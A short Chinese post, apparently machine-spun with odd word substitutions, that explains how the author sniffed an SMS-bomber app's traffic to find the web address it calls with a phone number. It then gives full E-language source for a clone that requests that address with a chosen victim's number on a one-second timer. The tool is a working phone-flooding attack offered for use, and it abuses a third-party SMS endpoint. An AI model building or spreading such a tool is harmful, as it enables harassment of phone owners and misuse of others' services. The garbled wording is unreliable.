下载一个手机炸弹手机软件
随意键入一个手机号随后挑选频次这类的
运用WSockExpert_Cn.exe监视手机炸弹
得到http://sms.98960.com/pages/user-newlogin.asp?number=13088170991
原先手机炸弹只不过一个URL循环系统递交的专用工具罢了
依照他的构思因为我写了一个类的手机炸弹专用工具
编程语言:e语言
源码以下:
.适用库 HTMLView
.适用库 iext

.程序流程集 对话框程序流程集1

.子程序 _按钮1_被点击

HTML文件访问 框1.详细地址 = “http://sms.98960.com/pages/user-newlogin.asp?number=” + 编辑框1.內容
非常列表框1.插进表项 (, “message sannding successful!”, , , , )
时钟1.时钟周期 = 1000

.子程序 __起动对话框_建立结束

按钮1.获得聚焦点 ()

.子程序 _按钮2_被点击

按钮1.严禁 = 真
时钟1.时钟周期 = 1215752191

.子程序 _按钮3_被点击

按钮1.严禁 = 假

.子程序 _时钟1_周期时间恶性事件

_按钮1_被点击 ()